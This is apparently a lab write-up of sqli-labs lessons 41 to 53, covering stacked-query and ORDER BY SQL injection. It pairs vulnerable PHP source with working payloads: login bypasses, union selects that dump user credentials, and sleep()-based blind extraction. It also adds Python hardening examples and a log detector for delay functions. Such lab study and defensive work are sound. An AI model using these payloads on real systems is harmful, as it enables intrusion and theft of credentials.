
SQLI-LAB的实战记录(Less41-Less53)


Contents:

Less - 41 Stacked Query Integer type blind
Less - 42 Stacked Query error based
Less - 43 Stacked Query String type
Less - 44 Stacked Query blind
Less - 45 Stacked Query Blind based twist
Less - 46 ORDER BY-Error-Numeric
Less - 47 ORDER BY Clause-Error-Single quote
Less - 48 ORDER BY Clause Blind based
Less - 49 ORDER BY Clause Blind based
Less - 50 ORDER BY Clause Blind based
Less - 51 ORDER BY Clause Blind based
Less - 52 ORDER BY Clause Blind based
Less - 53 ORDER BY Clause Blind based

What follows is only the record I wrote while working through the sqli-lab exercises; it is for reference only.

Because I had already studied some SQL injection material, most of the content is given without explanation; if anything is unclear, please look it up with a search engine, which should turn up what you need.

Less - 41 Stacked Query Integer type blind

(Lesson 41: stacked query, integer type, blind)

Test:

http://localhost/sqli-lab/Less-41/index.php?id=1'

Note: the query breaks, but no error message is displayed.

Source Code:

// $id is the id query parameter, used unquoted and unescaped (see the test above)
$sql="SELECT * FROM users WHERE id=$id LIMIT 0,1";

if (mysqli_multi_query($con1, $sql)){
    if ($result = mysqli_store_result($con1)){
        if($row = mysqli_fetch_row($result)){
            printf("Your Username is : %s", $row[1]);
            printf("Your Password is : %s", $row[2]);
        }
    }
    if (mysqli_more_results($con1)) {
        // further result sets of a stacked query are discarded, not shown
    }
}

Solution:

http://localhost/sqli-lab/Less-41/index.php?id=0 or 1=1 %23

Others:

http://localhost/sqli-lab/Less-41/index.php?id=0 union select 1,version(),database() %23

http://localhost/sqli-lab/Less-41/index.php?id=0 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database() %23

http://localhost/sqli-lab/Less-41/index.php?id=0 union select 1,group_concat(username),group_concat(password) from security.users where 1 %23

Less - 42 Stacked Query error based

(Lesson 42: stacked query, error based)

Test:

http://localhost/sqli-lab/Less-42/index.php

login_user=admin&login_password=11'&mysubmit=login

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''11'' at line 1

Note: the password is wrapped in single quotes.

Source Code:

$username = mysqli_real_escape_string($con1,$_POST["login_user"]);
$password = $_POST["login_password"];   // not escaped

$sql = "SELECT * FROM users WHERE username='$username' and password='$password'";

if (@mysqli_multi_query($con1, $sql)){
    /* store first result set */
    if($result = @mysqli_store_result($con1)){
        if($row = @mysqli_fetch_row($result)){
            if ($row[1]){
                return $row[1];
            }else{
                return 0;
            }
        }
    }else{
        print_r(mysqli_error($con1));
    }
}else{
    print_r(mysqli_error($con1));
}

Solution:

login_user=admin&login_password=1' or '1'='1&mysubmit=login

Others:

login_user=admin&login_password=0' union select 1,database(),3 or '1'='1&mysubmit=login

login_user=admin&login_password=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #&mysubmit=login

login_user=admin&login_password=0' union select 1,group_concat(username),group_concat(password) from security.users where 1 #&mysubmit=login

Less - 43 Stacked Query String type

(Lesson 43: stacked query, string type)

Test:

http://localhost/sqli-lab/Less-43/index.php

login_user=admin&login_password=11'&mysubmit=login

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''11'')' at line 1

Note: the password is wrapped in single quotes (and parentheses).

Source Code:

$username = mysqli_real_escape_string($con1,$_POST["login_user"]);
$password = $_POST["login_password"];   // not escaped

$sql = "SELECT * FROM users WHERE username=('$username') and password=('$password')";

if (@mysqli_multi_query($con1, $sql)){
    if($result = @mysqli_store_result($con1)){
        if($row = @mysqli_fetch_row($result)){
            if ($row[1]){
                return $row[1];
            }else{
                return 0;
            }
        }
    }else{
        print_r(mysqli_error($con1));
    }
}else{
    print_r(mysqli_error($con1));
}

Solution:

login_user=admin&login_password=1') or ('1')=('1&mysubmit=login

Others:

login_user=admin&login_password=0') union select 1,database(),3 or ('1')=('1&mysubmit=login

login_user=admin&login_password=0') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #&mysubmit=login

login_user=admin&login_password=0') union select 1,group_concat(username),group_concat(password) from security.users where 1 #&mysubmit=login

Less - 44 Stacked Query blind

(Lesson 44: stacked query, blind)

Test:

http://localhost/sqli-lab/Less-44/index.php

login_user=admin&login_password=0'&mysubmit=login

Note: no error message is displayed.

Source Code:

$username = mysqli_real_escape_string($con1,$_POST["login_user"]);
$password = $_POST["login_password"];   // not escaped

$sql = "SELECT * FROM users WHERE username='$username' and password='$password'";

if (@mysqli_multi_query($con1, $sql)){
    if($result = @mysqli_store_result($con1)){
        if($row = @mysqli_fetch_row($result)){
            if ($row[1]){
                return $row[1];
            }else{
                return 0;
            }
        }
    }
    // no else branch: errors are swallowed, hence the blind behaviour
}

Solution:

login_user=admin&login_password=1' or '1'='1&mysubmit=login

Others:

login_user=admin&login_password=0' union select 1,database(),3 or '1'='1&mysubmit=login

login_user=admin&login_password=0' union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #&mysubmit=login

login_user=admin&login_password=0' union select 1,group_concat(username),group_concat(password) from security.users where 1 #&mysubmit=login

Less - 45 Stacked Query Blind based twist

(Lesson 45: stacked query, blind based, twist)

Test:

http://localhost/sqli-lab/Less-45/index.php

login_user=admin&login_password=0'&mysubmit=login

Note: no error message is displayed.

Source Code:

$username = mysqli_real_escape_string($con1, $_POST["login_user"]);
$password = $_POST["login_password"];   // not escaped

$sql = "SELECT * FROM users WHERE username=('$username') and password=('$password')";

if (@mysqli_multi_query($con1, $sql)){
    if($result = @mysqli_store_result($con1)){
        if($row = @mysqli_fetch_row($result)){
            if ($row[1]){
                return $row[1];
            }else{
                return 0;
            }
        }
    }
    // no else branch: errors are swallowed, hence the blind behaviour
}

Solution:

login_user=admin&login_password=1') or ('1')=('1&mysubmit=login

Others:

login_user=admin&login_password=0') union select 1,database(),3 or ('1')=('1&mysubmit=login

login_user=admin&login_password=0') union select 1,group_concat(table_name),3 from information_schema.tables where table_schema='security' #&mysubmit=login

login_user=admin&login_password=0') union select 1,group_concat(username),group_concat(password) from security.users where 1 #&mysubmit=login
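Less-41 to Less-45 all build the SQL text by pasting the request parameter into it and then hand the string to mysqli_multi_query(), which executes every statement it contains. The following is an added example, not code from sqli-labs or this write-up: it reproduces that shape in Python against an in-memory sqlite3 table next to the hardened form (bound parameters, plus an integer check for the Less-41 case), and shows that a single-statement execution API refuses text carrying more than one statement. The table rows, the function names and the sample data are constructed for this illustration.

```python
import sqlite3


def make_db():
    """Constructed sample data in the shape of the lab's users table
    (id, username, password); in-memory, so the example runs offline."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    con.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you"), (3, "admin", "adminpass")],
    )
    return con


def login_vulnerable(con, username, password):
    """Same shape as the Less-42/44 query: the password is pasted into the SQL
    text, so a quote in it closes the literal and the rest is parsed as SQL."""
    sql = f"SELECT * FROM users WHERE username='{username}' and password='{password}'"
    row = con.execute(sql).fetchone()
    return row[1] if row else 0


def login_hardened(con, username, password):
    """The SQL text is a constant; both values travel as bound parameters, so
    quotes and OR clauses in the input are compared as data, never parsed."""
    sql = "SELECT * FROM users WHERE username = ? AND password = ?"
    row = con.execute(sql, (username, password)).fetchone()
    return row[1] if row else 0


def lookup_vulnerable(con, user_id):
    """Less-41 shape: an unquoted integer, so no quote is needed to break out."""
    sql = f"SELECT * FROM users WHERE id={user_id} LIMIT 0,1"
    row = con.execute(sql).fetchone()
    return row[1] if row else 0


def lookup_hardened(con, user_id):
    """Validate the type first (anything that is not an integer is refused),
    then bind it; either step alone already closes the hole."""
    try:
        uid = int(user_id)
    except (TypeError, ValueError):
        return 0
    row = con.execute("SELECT * FROM users WHERE id = ? LIMIT 1", (uid,)).fetchone()
    return row[1] if row else 0


def runs_as_given(con, sql):
    """The lab uses mysqli_multi_query(), which runs every ';'-separated
    statement in the string.  sqlite3's execute() is single-statement and
    raises on a second one; return whether the text was accepted."""
    try:
        con.execute(sql)
        return True
    except (sqlite3.ProgrammingError, sqlite3.Warning):
        return False


if __name__ == "__main__":
    db = make_db()
    print("vulnerable:", login_vulnerable(db, "admin", "1' or '1'='1"))  # first row, no password known
    print("hardened:  ", login_hardened(db, "admin", "1' or '1'='1"))    # 0
    print("single-statement API accepts 'SELECT 1; SELECT 2':", runs_as_given(db, "SELECT 1; SELECT 2"))
```

The two mysqli equivalents are mysqli_prepare()/bind_param() for the values and mysqli_query() (one statement) instead of mysqli_multi_query() for execution; escaping the username alone, as the lab does, leaves the password path open.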

Less - 46 ORDER BY-Error-Numeric

(Lesson 46: GET, error based, numeric type, ORDER BY clause)

Test:

http://localhost/sqli-lab/Less-46/index.php?sort=1'

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

Note: numeric type.

http://localhost/sqli-lab/Less-46/index.php?sort=1+asc

http://localhost/sqli-lab/Less-46/index.php?sort=1+desc

Note: comparing whether the data returned for asc and desc differs is a quick way to tell whether the ORDER BY clause is injectable.

Source Code:

// $id holds the sort query parameter, spliced into the clause as-is
$sql = "SELECT * FROM users ORDER BY $id";

$result = mysql_query($sql);

if ($result){
    while ($row = mysql_fetch_assoc($result)){
        echo $row['id'];
        echo $row['username'];
        echo $row['password'];
    }
}else{
    print_r(mysql_error());
}

Solution:

http://localhost/sqli-lab/Less-46/index.php?sort=1 and if(1=1, sleep(1), null)

Others:

http://localhost/sqli-lab/Less-46/index.php?sort=1 and (length(database())) = 8 and if(1=1, sleep(1), null)

http://localhost/sqli-lab/Less-46/index.php?sort=1 and (ascii(substr((select database()) ,1,1))) = 115 and if(1=1, sleep(1), null)

Less - 47 ORDER BY Clause-Error-Single quote

(Lesson 47: ORDER BY clause, error based, single quote)

Test:

http://localhost/sqli-lab/Less-47/index.php?sort=1'

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' at line 1

Note: sort is wrapped in single quotes.

Source Code:

// $id holds the sort query parameter; as a quoted string it is a constant
// expression, so ordering only changes once the quote is broken out of
$sql = "SELECT * FROM users ORDER BY '$id'";

$result = mysql_query($sql);

if ($result){
    while ($row = mysql_fetch_assoc($result)){
        echo $row['id'];
        echo $row['username'];
        echo $row['password'];
    }
}else{
    print_r(mysql_error());
}

Solution:

http://localhost/sqli-lab/Less-47/index.php?sort=1' and if(1=1, sleep(1), null) and '1'='1

Others:

http://localhost/sqli-lab/Less-47/index.php?sort=1' and (length(database())) = 8 and if(1=1, sleep(1), null) and '1'='1

http://localhost/sqli-lab/Less-47/index.php?sort=1' and (ascii(substr((select database()) ,1,1))) = 115 and if(1=1, sleep(1), null) and '1'='1
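The fix for the ORDER BY lessons (Less-46 onward) differs from the login lessons: a bound parameter inside ORDER BY is a constant, so it sorts nothing, and `ORDER BY '$id'` is likewise a constant until the quote is broken out of. What works is an allow-list that maps the client's sort token onto a column name the server chose itself. The following is an added example, not code from sqli-labs: the lab's raw splice next to the allow-listed form, in Python against an in-memory sqlite3 table; the rows, the mapping of sort=1/2/3 onto columns and the function names are constructed for this illustration.

```python
import sqlite3

# Hypothetical allow-list: the sort tokens the lab pages send (sort=1, 2, 3)
# mapped onto fixed column identifiers; anything else is rejected outright.
SORT_COLUMNS = {"1": "id", "2": "username", "3": "password"}
SORT_DIRECTIONS = {"asc": "ASC", "desc": "DESC"}


def make_db():
    """Constructed rows in the shape of the lab's users table (in-memory)."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (id INTEGER, username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?, ?)",
                    [(1, "Dumb", "Dumb"), (2, "Angelina", "I-kill-you"), (3, "admin", "adminpass")])
    return con


def user_ids_vulnerable(con, sort):
    """Less-46/48/50/52 shape: the raw sort parameter becomes part of the
    ORDER BY clause, so the client controls SQL syntax, not just a value."""
    return [row[0] for row in con.execute(f"SELECT * FROM users ORDER BY {sort}")]


def build_order_by(sort, direction="asc"):
    """Look the token up; only a server-chosen identifier ever reaches the SQL
    text, quoted as an identifier, with the direction from a second allow-list."""
    column = SORT_COLUMNS.get(str(sort))
    order = SORT_DIRECTIONS.get(str(direction).lower())
    if column is None or order is None:
        raise ValueError(f"unsupported sort parameter: {sort!r} {direction!r}")
    return f'SELECT * FROM users ORDER BY "{column}" {order}'


def user_ids_hardened(con, sort, direction="asc"):
    return [row[0] for row in con.execute(build_order_by(sort, direction))]


def is_rejected(sort, direction="asc"):
    """True when the allow-list refuses the input, which is what any of the
    time-based probes above get once the clause is no longer raw text."""
    try:
        build_order_by(sort, direction)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    db = make_db()
    print("raw splice, sort='1 desc':", user_ids_vulnerable(db, "1 desc"))   # [3, 2, 1]
    print("allow-list, sort='2' desc:", user_ids_hardened(db, "2", "desc"))  # [3, 1, 2]
    print("probe rejected:", is_rejected("1 and if(1=1, sleep(1), null)"))  # True
```

Rejecting rather than silently falling back to a default column is deliberate: a request that fails the allow-list is worth logging, and a fallback would hide exactly the asc/desc difference the note under Less-46 uses as its test.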

Less - 48 ORDER BY Clause Blind based

(Lesson 48: ORDER BY clause, blind based)

Test:

http://localhost/sqli-lab/Less-48/index.php?sort=1'

http://localhost/sqli-lab/Less-48/index.php?sort=1"

http://localhost/sqli-lab/Less-48/index.php?sort=1')

http://localhost/sqli-lab/Less-48/index.php?sort=1")

Note: none of them displays an error message.

Source Code:

// $id holds the sort query parameter, spliced into the clause as-is
$sql = "SELECT * FROM users ORDER BY $id";

$result = mysql_query($sql);

if ($result){
    while ($row = mysql_fetch_assoc($result)){
        echo $row['id'];
        echo $row['username'];
        echo $row['password'];
    }
}
// no else branch: errors are swallowed, hence the blind behaviour

Solution:

http://localhost/sqli-lab/Less-48/index.php?sort=1 and if(1=1, sleep(1), null)

Others:

http://localhost/sqli-lab/Less-48/index.php?sort=1 and (length(database())) = 8 and if(1=1, sleep(1), null)

http://localhost/sqli-lab/Less-48/index.php?sort=1 and (ascii(substr((select database()) ,1,1))) = 115 and if(1=1, sleep(1), null)

Less - 49 ORDER BY Clause Blind based

(Lesson 49: ORDER BY clause, blind based)

Test:

http://localhost/sqli-lab/Less-49/index.php?sort=1'

Note: no error message is displayed.

http://localhost/sqli-lab/Less-49/index.php?sort=1"

Note: the page behaves normally; together with the previous test, this shows sort is wrapped in single quotes.

Source Code:

// $id holds the sort query parameter, wrapped in single quotes
$sql = "SELECT * FROM users ORDER BY '$id'";

$result = mysql_query($sql);

if ($result){
    while ($row = mysql_fetch_assoc($result)){
        echo $row['username'];
        echo $row['password'];
    }
}
// no else branch: errors are swallowed, hence the blind behaviour

Solution:

http://localhost/sqli-lab/Less-49/index.php?sort=1' and if(1=1, sleep(1), null) and '1'='1

Others:

http://localhost/sqli-lab/Less-49/index.php?sort=1' and (length(database())) = 8 and if(1=1, sleep(1), null) and '1'='1

http://localhost/sqli-lab/Less-49/index.php?sort=1' and (ascii(substr((select database()) ,1,1))) = 115 and if(1=1, sleep(1), null) and '1'='1

Less - 50 ORDER BY Clause Blind based

(Lesson 50: ORDER BY clause, blind based)

Test:

http://localhost/sqli-lab/Less-50/index.php?sort=1'

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1

Note: numeric type.

Source Code:

// $id holds the sort query parameter, spliced into the clause as-is;
// mysqli_multi_query() makes this a stacked-query variant of Less-46
$sql="SELECT * FROM users ORDER BY $id";

if (mysqli_multi_query($con1, $sql)){
    if ($result = mysqli_store_result($con1)){
        while($row = mysqli_fetch_row($result)){
            printf("%s", $row[0]);
            printf("%s", $row[1]);
            printf("%s", $row[2]);
        }
    }
}else{
    print_r(mysqli_error($con1));
}

Solution:

http://localhost/sqli-lab/Less-50/index.php?sort=1 and if(1=1, sleep(1), null)

Others:

http://localhost/sqli-lab/Less-50/index.php?sort=1 and (length(database())) = 8 and if(1=1, sleep(1), null)

http://localhost/sqli-lab/Less-50/index.php?sort=1 and (ascii(substr((select database()) ,1,1))) = 115 and if(1=1, sleep(1), null)

Less - 51 ORDER BY Clause Blind based

(Lesson 51: ORDER BY clause, blind based)

Test:

http://localhost/sqli-lab/Less-51/index.php?sort=1'

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' at line 1

Note: sort is wrapped in single quotes.

Source Code:

// $id holds the sort query parameter, wrapped in single quotes;
// mysqli_multi_query() makes this a stacked-query variant of Less-47
$sql="SELECT * FROM users ORDER BY '$id'";

if (mysqli_multi_query($con1, $sql)){
    if ($result = mysqli_store_result($con1)){
        while($row = mysqli_fetch_row($result)){
            printf("%s", $row[0]);
            printf("%s", $row[1]);
            printf("%s", $row[2]);
        }
    }
}else{
    print_r(mysqli_error($con1));
}

Solution:

http://localhost/sqli-lab/Less-51/index.php?sort=1' and if(1=1, sleep(1), null) and '1'='1

Others:

http://localhost/sqli-lab/Less-51/index.php?sort=1' and (length(database())) = 8 and if(1=1, sleep(1), null) and '1'='1

http://localhost/sqli-lab/Less-51/index.php?sort=1' and (ascii(substr((select database()) ,1,1))) = 115 and if(1=1, sleep(1), null) and '1'='1

Less - 52 ORDER BY Clause Blind based

(Lesson 52: ORDER BY clause, blind based)

Test:

http://localhost/sqli-lab/Less-52/index.php?sort=1'

http://localhost/sqli-lab/Less-52/index.php?sort=1"

http://localhost/sqli-lab/Less-52/index.php?sort=1')

http://localhost/sqli-lab/Less-52/index.php?sort=1")

Note: none of them displays an error message.

Source Code:

// $id holds the sort query parameter, spliced into the clause as-is
$sql="SELECT * FROM users ORDER BY $id";

if (mysqli_multi_query($con1, $sql)){
    if ($result = mysqli_store_result($con1)){
        while($row = mysqli_fetch_row($result)){
            printf("%s", $row[0]);
            printf("%s", $row[1]);
            printf("%s", $row[2]);
        }
    }
}
// no else branch: errors are swallowed, hence the blind behaviour

Solution:

http://localhost/sqli-lab/Less-52/index.php?sort=1 and if(1=1, sleep(1), null)

Others:

http://localhost/sqli-lab/Less-52/index.php?sort=1 and (length(database())) = 8 and if(1=1, sleep(1), null)

http://localhost/sqli-lab/Less-52/index.php?sort=1 and (ascii(substr((select database()) ,1,1))) = 115 and if(1=1, sleep(1), null)

Less - 53 ORDER BY Clause Blind based

(Lesson 53: ORDER BY clause, blind based)

Test:

http://localhost/sqli-lab/Less-53/index.php?sort=1'

Note: no error message is displayed.

http://localhost/sqli-lab/Less-53/index.php?sort=1"

Note: the page behaves normally; together with the previous test, this shows sort is wrapped in single quotes.

Source Code:

// $id holds the sort query parameter, wrapped in single quotes
$sql="SELECT * FROM users ORDER BY '$id'";

if (mysqli_multi_query($con1, $sql)) {
    if ($result = mysqli_store_result($con1)){
        while($row = mysqli_fetch_row($result)){
            printf("%s", $row[0]);
            printf("%s", $row[1]);
            printf("%s", $row[2]);
        }
    }
}
// no else branch: errors are swallowed, hence the blind behaviour

Solution:

http://localhost/sqli-lab/Less-53/index.php?sort=1' and if(1=1, sleep(1), null) and '1'='1

Others:

http://localhost/sqli-lab/Less-53/index.php?sort=1' and (length(database())) = 8 and if(1=1, sleep(1), null) and '1'='1

http://localhost/sqli-lab/Less-53/index.php?sort=1' and (ascii(substr((select database()) ,1,1))) = 115 and if(1=1, sleep(1), null) and '1'='1
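Every solution from Less-46 to Less-53 depends on the server pausing for a second when a condition holds, and that is also what makes these probes stand out on the server side: the request carries a delay function and takes about a second longer than its neighbours. The following is an added example, not part of the original write-up: a small detector that parses constructed access-log lines (combined format with the request time in seconds appended as the last field; the lines, addresses, threshold and function names are all invented for this illustration), URL-decodes the request target, and flags entries that carry a delay function or took unusually long.

```python
import re
from urllib.parse import unquote_plus

# Constructed access-log lines, not captured from any real server.  Lines 2
# and 4 carry the lab's time-based probes and took about a second longer.
LOG_LINES = """\
10.0.0.5 - - [10/Oct/2023:12:00:01 +0000] "GET /sqli-lab/Less-46/index.php?sort=1 HTTP/1.1" 200 512 0.004
10.0.0.5 - - [10/Oct/2023:12:00:02 +0000] "GET /sqli-lab/Less-46/index.php?sort=1+and+if(1%3D1,+sleep(1),+null) HTTP/1.1" 200 512 1.007
10.0.0.5 - - [10/Oct/2023:12:00:03 +0000] "GET /sqli-lab/Less-46/index.php?sort=2+desc HTTP/1.1" 200 512 0.003
10.0.0.9 - - [10/Oct/2023:12:00:04 +0000] "GET /sqli-lab/Less-50/index.php?sort=1%20and%20(length(database()))%20%3D%208%20and%20if(1%3D1,%20sleep(1),%20null) HTTP/1.1" 200 512 1.012
"""

# Combined log format with request time (seconds) appended as the last field.
LINE_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) (?P<bytes>\d+|-) (?P<rt>\d+\.\d+)$'
)

# Delay functions used by time-based probes, matched after URL decoding so
# that "+", "%20" and "%3D" encodings do not hide them.
DELAY_RE = re.compile(r"\b(?:(?:sleep|benchmark|pg_sleep)\s*\(|waitfor\s+delay\b)", re.I)

# Constructed threshold; in practice derive it from the page's normal latency.
SLOW_SECONDS = 0.5


def parse_line(line):
    """Return a dict of fields for a well-formed line, else None."""
    m = LINE_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["rt"] = float(rec["rt"])
    rec["decoded"] = unquote_plus(rec["target"])
    return rec


def classify(rec):
    """List the reasons a record looks like a time-based blind probe.
    Either signal alone is weak; both together on one request are strong."""
    reasons = []
    if DELAY_RE.search(rec["decoded"]):
        reasons.append("delay-function")
    if rec["rt"] >= SLOW_SECONDS:
        reasons.append("slow-response")
    return reasons


def detect(log_text):
    """Run the classifier over every parseable line and collect the hits."""
    findings = []
    for n, line in enumerate(log_text.splitlines(), start=1):
        rec = parse_line(line)
        if rec is None:
            continue
        reasons = classify(rec)
        if reasons:
            findings.append({"line": n, "ip": rec["ip"], "path": rec["decoded"], "reasons": reasons})
    return findings


if __name__ == "__main__":
    for hit in detect(LOG_LINES):
        print(f"line {hit['line']} from {hit['ip']}: {', '.join(hit['reasons'])} -> {hit['path']}")
```

The request-time field is what turns a keyword match into evidence: a single slow request is noise, but a request that names sleep() and is slower by roughly the argument it passed is the behaviour the Less-46 to Less-53 solutions rely on, and the same query pattern with ascii()/substr() repeated across many requests from one address is the character-by-character extraction those "Others" payloads perform.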
